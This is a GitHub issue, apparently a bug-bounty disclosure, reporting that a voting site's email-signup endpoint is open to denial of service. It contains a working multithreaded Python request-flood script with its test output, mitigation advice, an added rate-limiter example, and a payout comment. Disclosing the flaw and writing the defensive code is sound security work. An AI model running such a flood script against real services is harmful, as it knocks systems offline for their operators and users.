siv-org / siv

Secure Internet Voting protocol
https://siv.org

Potential Denial of Service (DoS) Vulnerability Due to High Volume of Requests #205

Open cjackett opened 3 months ago

cjackett commented 3 months ago

Issue Description

Note: This issue is a refinement of https://github.com/siv-org/siv/issues/193, separating concerns related to CORS and focusing on a potential DoS attack vector.

During recent local testing, it was discovered that the email-signup endpoint (/api/email-signup) is vulnerable to resource abuse attacks, which could result in a denial of service (DoS). A stress test involving a large number of concurrent requests to this endpoint caused significant strain on the server, leading to eventual failure.

Exploitation Script

The following Python script was used to simulate a DoS attack by sending multiple concurrent requests to the email-signup endpoint:

import requests
import threading
import time
import os

# Target URL
url = "http://localhost:3000/api/email-signup"

# Payload data to send in the POST request
data = {
    "email": "test@example.com"
}

# Number of CPU cores on the machine
num_threads = os.cpu_count()

# Number of requests per thread
requests_per_thread = 10000000

def send_request():
    for _ in range(requests_per_thread):
        try:
            response = requests.post(url, json=data)
            print(f"Response status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")

def main():
    threads = []

    print(f"Starting {num_threads} threads...")

    # Start the threads
    for _ in range(num_threads):
        thread = threading.Thread(target=send_request)
        thread.start()
        threads.append(thread)
        time.sleep(0.1)  # Slight delay to simulate staggered requests

    # Wait for all threads to complete
    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()

Testing Results

The script successfully sent a high volume of requests to the email-signup endpoint, resulting in substantial server load. The development server issued a MaxListenersExceededWarning, indicating possible memory leaks due to the excessive number of concurrent requests:

(node:9431) MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 server/api/email-signup listeners added to [EventEmitter]. MaxListeners is 10. Use emitter.setMaxListeners() to increase limit

Although the SIV website remained partially responsive, intermittent slowdowns were observed. Eventually, the backend began generating HTTP 500 errors, signaling its inability to handle the excessive request load:

error - GoogleError: Total timeout of API google.firestore.v1.Firestore exceeded 600000 milliseconds before any response was received.

Mitigation

While the production SIV system implements rate limiting as a countermeasure against such attacks, no rate limiting code was found in the current codebase.

Recommendations:

  1. Verify Rate Limiting: Ensure that rate limiting is active and properly configured for all critical endpoints, including email-signup.

  2. Stress Testing: Conduct regular stress testing on the production environment to ensure that it can withstand high volumes of traffic without degrading performance or becoming unavailable.

  3. EventEmitter Configuration: Review and adjust the MaxListeners setting or refactor the code to prevent memory leaks under high load conditions.
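
One way to implement recommendation 1 above, as an added example that is not part of the SIV codebase or of this issue: a per-client token-bucket rate limiter for a Node.js API route such as /api/email-signup. The `(req, res)` handler shape with `res.status().json()`, the `withRateLimit` / `takeToken` / `clientKey` names, the limits (burst of 5, one request per second sustained) and the in-memory bucket map are all assumptions of this example, chosen for a single-process server; a multi-instance deployment would keep the buckets in a shared store instead.

```javascript
// Added example (not SIV project code): per-client token-bucket rate limiting
// for a Node.js API route. Assumed: a single process, handlers shaped as
// (req, res) with req.headers, req.socket.remoteAddress, res.setHeader(),
// res.status(code) and res.json(body). Limits below are illustrative.

const CAPACITY = 5;                     // burst a client may send at once
const REFILL_PER_SEC = 1;               // sustained rate: one request per second
const SWEEP_AFTER_MS = 10 * 60 * 1000;  // forget clients idle for 10 minutes

const buckets = new Map();              // clientKey -> { tokens, lastMs }

// Take one token for `key` at time `nowMs`. Returns whether the request is
// allowed and, if not, how long the client should wait before retrying.
function takeToken(key, nowMs, capacity = CAPACITY, refillPerSec = REFILL_PER_SEC) {
  let b = buckets.get(key);
  if (!b) {
    b = { tokens: capacity, lastMs: nowMs };
    buckets.set(key, b);
  }
  // Refill in proportion to elapsed time, never above capacity.
  const elapsedSec = Math.max(0, nowMs - b.lastMs) / 1000;
  b.tokens = Math.min(capacity, b.tokens + elapsedSec * refillPerSec);
  b.lastMs = nowMs;
  if (b.tokens >= 1) {
    b.tokens -= 1;
    return { allowed: true, retryAfterMs: 0 };
  }
  const deficit = 1 - b.tokens;
  return { allowed: false, retryAfterMs: Math.ceil((deficit / refillPerSec) * 1000) };
}

// Drop buckets nobody has touched recently, so a flood from many distinct
// addresses cannot grow the map without bound. Returns the remaining count.
function sweepIdle(nowMs) {
  for (const [key, b] of buckets) {
    if (nowMs - b.lastMs > SWEEP_AFTER_MS) buckets.delete(key);
  }
  return buckets.size;
}

// Key on the connecting address. Only honour X-Forwarded-For when a reverse
// proxy you control sets it; otherwise the client picks its own key.
function clientKey(req, trustProxy = false) {
  const xff = trustProxy ? req.headers['x-forwarded-for'] : undefined;
  if (xff) return String(xff).split(',')[0].trim();
  return (req.socket && req.socket.remoteAddress) || 'unknown';
}

// Wrap a route handler so over-limit callers get 429 + Retry-After and the
// real handler (and its Firestore call) is never reached for them.
function withRateLimit(handler, opts = {}) {
  const now = opts.now || Date.now;   // injectable clock for tests
  return function limited(req, res) {
    const verdict = takeToken(clientKey(req, opts.trustProxy), now());
    if (!verdict.allowed) {
      res.setHeader('Retry-After', String(Math.ceil(verdict.retryAfterMs / 1000)));
      return res.status(429).json({ error: 'Too many requests' });
    }
    return handler(req, res);
  };
}

// Usage (constructed): export withRateLimit(emailSignupHandler) as the route,
// and call sweepIdle(Date.now()) from a periodic timer.
```

The limiter runs before any database work, which is the point for the failure seen in this issue: the Firestore timeouts appeared because every request reached the backend. Rejected requests cost a map lookup and a 429, and the sweep keeps the map bounded when an attacker rotates source addresses.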

arianabuilds commented 2 months ago

Entry Summary for HACK SIV @ DEF CON 2024

Thanks again for participating! This submission earned $0.00 from SIV and $107.29 from the Public Vote, for a total of $107.29.

Here's what we noted in our evaluation:

What takes away from it

Issue to track getting paid: https://github.com/siv-org/hack.siv.org/issues/10